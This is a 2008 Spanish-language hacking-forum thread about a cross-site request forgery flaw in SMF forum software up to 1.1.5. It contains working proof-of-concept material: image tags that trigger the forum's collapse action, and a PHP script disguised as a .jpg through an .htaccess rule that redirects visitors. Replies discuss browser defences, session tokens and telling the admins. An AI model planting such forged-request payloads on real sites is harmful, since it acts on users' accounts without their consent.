elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  [°] CSRF en foros SMF => 1.1.5
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: [°] CSRF en foros SMF => 1.1.5  (Leído 8,523 veces)
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
[°] CSRF en foros SMF => 1.1.5
« en: 23 Agosto 2008, 09:41 am »

Por un foro limpio y ordenado vivan los CSRF de SMF 1.1.5  :P

visualiza el index del foro.

Fuente:
http://www.jccharry.com/comunidad/index.php?board=8.0

Código:
[img]http://www.jccharry.com/pruebas/smf1.0.5/1.jpg?colapsar=1&url=http://foro.elhacker.net/[/img]
[img]http://www.jccharry.com/pruebas/smf1.0.5/1.jpg?colapsar=2&url=http://foro.elhacker.net/[/img]
[img]http://www.jccharry.com/pruebas/smf1.0.5/1.jpg?colapsar=4&url=http://foro.elhacker.net/[/img]
[img]http://www.jccharry.com/pruebas/smf1.0.5/1.jpg?colapsar=6&url=http://foro.elhacker.net/[/img]
[img]http://www.jccharry.com/pruebas/smf1.0.5/1.jpg?colapsar=9&url=http://foro.elhacker.net/[/img]
[img]http://www.jccharry.com/pruebas/smf1.0.5/1.jpg?colapsar=10&url=http://foro.elhacker.net/[/img]
« Última modificación: 25 Septiembre 2008, 15:00 pm por sirdarckcat » En línea

Newbie´s

Desconectado Desconectado

Mensajes: 20


Ver Perfil
Re: XSRF en foros SMF => 1.1.5
« Respuesta #1 en: 23 Agosto 2008, 10:39 am »

Hay algún riesgo para un User ???...

Mmm... creo que se podrían tener datos valiosos o no ???... se supone que estan visualizando un "imagen" de tu Server donde se almacenan direcciones IP... además de poder ejecutar algún Script dentro de este mismo no es asi ???

Saludos cordiales...
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: XSRF en foros SMF => 1.1.5
« Respuesta #2 en: 23 Agosto 2008, 10:45 am »

Bueno, eso de ejecutar scripts atraves de imagenes es otro tema :P, claramente se podría tener tu ip ta,bién pero este no es el tema.

La falla solo puede hacer que el index se te vean todas las secciones colapsadas cada ves que veas la firma de alguien que tega ánimos de molestar.
En línea

cheatmaster

Desconectado Desconectado

Mensajes: 101


Ver Perfil
Re: XSRF en foros SMF => 1.1.5
« Respuesta #3 en: 23 Agosto 2008, 17:36 pm »

Es decir, basicamente, si creas un .htaccces con el codigo
Código:
<Files *.jpg> 
ForceType application/x-httpd-php
</Files>

y luego un archivo .php renombrado a x ejemplo bug.jpg con este codigo

Código:
<?php
/*
Prueba del concepto del XSRF en FMS => 1.1.5
http://www.jccharry.com/comunidad/
WHK - The hacktivism is not a crime.
*/

error_reporting(0);
$url = str_replace("cript","_",strtolower($_GET['url']));

if(is_numeric($_GET['colapsar']) and $url){
 header("location: ".$url."/index.php?action=collapse;c=".$_GET['colapsar'].";sa=collapse;#".$_GET['colapsar']);
}else{
 header("Content-type: image/png");
 echo base64_decode("iVBORw0KGgoAAAANSUhEUgAAAAsAAAARCAYAAAAL4VbbAAAAQUlEQVQokWP8//8/A7GAiWiVpCpmQRdgZGSEu+v///+MWBUjKyLojP///zOim4RTMTFgVPEgVMwIS8/40gYsGQAA4yQVHW/Zg08AAAAASUVORK5CYII=");
}

?>

Al ponerlo en tu host y luego en la web, se "estropearia" ? es asin ?
En línea

fandango
Another
Colaborador
***
Desconectado Desconectado

Mensajes: 1.905


Powered By Slackware!


Ver Perfil
Re: XSRF en foros SMF => 1.1.5
« Respuesta #4 en: 23 Agosto 2008, 21:01 pm »

Si la verdad que es bastante molesto  >:( saludos.
En línea

Silici0

Desconectado Desconectado

Mensajes: 217


Insider


Ver Perfil
Re: XSRF en foros SMF => 1.1.5
« Respuesta #5 en: 24 Agosto 2008, 01:40 am »

Por curiosidad tengo dos cuestiones:

supongo que el noscript no te libra de XSRF al no utilizar un script ¿hay algo que pueda hacer el usuario en su navegador para evitarlo?
Hablo del XSRF en general.

Y la segunda cuestión, donde pongo un 222222 ¿eso es el token que evita que se pueda hacer lo mismo pero borrando un mensaje?
Código:
/deletemsg.html;topic=1;msg=1;sesc=222222
En línea

"Lo que posees acabará poseyéndote."
.
..:
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: XSRF en foros SMF => 1.1.5
« Respuesta #6 en: 24 Agosto 2008, 03:37 am »

Citar
supongo que el noscript no te libra de XSRF al no utilizar un script ¿hay algo que pueda hacer el usuario en su navegador para evitarlo?
Hablo del XSRF en general.
en las opociones de no-script tienes la posibilidad de bloquear iframes , aunque esto no es una solución al 100% evitará muchos problemas.
Para evitar el redireccionamiento en headers no conozco nada. Talves pueda haber algún complemento que bloquee las redirecciones desde un header.
De todas formas siempre hay una forma de hacerlo, puedes evitar ataques pero no todos.

Citar
Y la segunda cuestión, donde pongo un 222222 ¿eso es el token que evita que se pueda hacer lo mismo pero borrando un mensaje?
Citar
/deletemsg.html;topic=1;msg=1;sesc=222222
Exacto, aunque hay otras muchas formas pero esa es solo una.
En línea

Silici0

Desconectado Desconectado

Mensajes: 217


Insider


Ver Perfil
Re: XSRF en foros SMF => 1.1.5
« Respuesta #7 en: 24 Agosto 2008, 03:52 am »

Muchisimas gracias por tu contestación, hare las pruebas bloqueando iframes con noscript porque no he encontrado otra manera.

¿Hay ya algun parche que añada un token a la acción de colapsar? ¿Alguna solucion que no sea quitar la opción de colapsar en el SMF?


Y por último y para evitar futuros malentendidos, supongo que antes de hacer esto avisarias a los administradores de este foro. Si no, no habría durado tanto este post y en vez de ser modificado el primer post habria sido borrado.

Esto último va por si alguien se le ocurre hacer la gracia en este foro o en cualquier otro que sepa que seguramente será baneado.
En línea

"Lo que posees acabará poseyéndote."
.
..:
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: XSRF en foros SMF => 1.1.5
« Respuesta #8 en: 24 Agosto 2008, 06:16 am »

Citar
¿Hay ya algun parche que añada un token a la acción de colapsar? ¿Alguna solucion que no sea quitar la opción de colapsar en el SMF?
SMF tiene la opción en "boards" o "foros" de asignar cual puede colapsarse y cual no, habría que darle la opción a cada uno de no colapsar.
Esta sería una solución temporal ya que la idea es que si se pueda colapsar pero no involuntariamente.

Citar
Y por último y para evitar futuros malentendidos, supongo que antes de hacer esto avisarias a los administradores de este foro. Si no, no habría durado tanto este post y en vez de ser modificado el primer post habria sido borrado.
Le avisé a un coadmin para que deshabilitara los colapsos de foros pero no se si lo hará o no, yo lo hice y no creo que el admin se moleste o si no me lo  hubiera hecho saber, es mas... si lo hubiera posteado en otro sitio de seguro lo hubieran probado acá primero sin avisarle a nadie y por lo menos acá ya todos están consientes del bug.

Si lo modificaron y no lo borraron es porque tienen el criterio que a otros le faltan.
En línea

sirdarckcat
Aspirante a supervillano
Moderador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: XSRF en foros SMF => 1.1.5
« Respuesta #9 en: 24 Agosto 2008, 07:49 am »

Citar
Le avisé a un coadmin para que deshabilitara los colapsos de foros pero no se si lo hará o no, yo lo hice y no creo que el admin se moleste o si no me lo  hubiera hecho saber, es mas... si lo hubiera posteado en otro sitio de seguro lo hubieran probado acá primero sin avisarle a nadie y por lo menos acá ya todos están consientes del bug.
Probablemente si se haga :¬¬ :¬¬
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Anti-CSRF Filter Bypass SMF 2.0 / 1.1.14
Nivel Web
Preth00nker 0 3,373 Último mensaje 25 Agosto 2011, 21:31 pm
por Preth00nker
[Perl] CSRF T00l
Scripting
BigBear 0 1,882 Último mensaje 7 Octubre 2011, 01:16 am
por BigBear
CSRF
Hacking
fokin 1 2,820 Último mensaje 22 Abril 2014, 16:29 pm
por dantemc
Facebook CSRF - RECONNECT
Bugs y Exploits
el-brujo 0 3,029 Último mensaje 12 Marzo 2015, 18:26 pm
por el-brujo
Foros?
Dudas Generales
AFKXDLOLNASHE 6 4,527 Último mensaje 15 Septiembre 2021, 23:38 pm
por DtxdF
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines